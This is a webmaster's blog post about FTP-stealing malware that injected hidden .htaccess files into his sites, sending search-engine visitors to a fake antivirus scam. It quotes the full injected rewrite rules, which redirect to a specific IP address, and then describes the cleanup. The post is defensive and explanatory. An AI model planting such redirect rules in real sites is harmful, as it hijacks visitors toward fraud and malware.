Been Busy

Ya, the title says it all. Between some hacker getting a hold of 20 website servers ftps and uploading HTACCESS files that redirect people finding my sites on all search engines. The hacker was redirecting my sites from Google/MSN/Yahoo to some fake antivirus software site that just asks you to pay to remove your viruses (in other words steal your money).

Here’s how it happened, someone in my network of computers (or me, who knows?) downloaded this nasty Malware information about it can be found here. Or a newer version of this Malware. Norton and Avast Anti Viruses did absolutely nothing to pick this up. The Malware sits on your system until you make an FTP connection, then uploads HTACCESS files to all your sites on your FTP server. Funny I even checked the HTACCESS files last night, and it was just a big whitespace, the people are actually putting this in a few pages down into the file trying to hide the code:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]

That 89.28.13.201 IP address goes to that fake Anti-Virus software site, which is more Malware. So when people were going to the search engines and finding my sites, it’d go to this Malware site. Coincidently all my sites got knocked out of the search engines for now (until they re-review them), since the sites got flagged for having Malware (even though it redirected to a different IP address). If you even attempt to access my sites through the search engine then they will stop you and warn you, which will stop anyone from visiting.

What did I do to fix it? I had installed Malwarebytes, it found the bug right away. After I had to re-upload all the correct HTACCESS files so that they would not get redirected (I also set in a condition so my sites go to their www. addresses even if you don’t type the www. in the URL – for a few reasons and SEO). After this I had to go onto Google webmaster tools and go into each site and ask for a review and explain what happened with the Malware and how it was removed. FUN!

» How my Webmaster removed some nasty malware that hijacked my website - Calypso Island Chronicles said . . .

January 16th, 2009

[...] Fix”. A must read! In addition, while troubleshooting this malware issue, we came across another site that also dealt with the same problem (and offered a similar fix). Needless to say, after the nasty [...]

One Response to “Been Busy”

Leave a Reply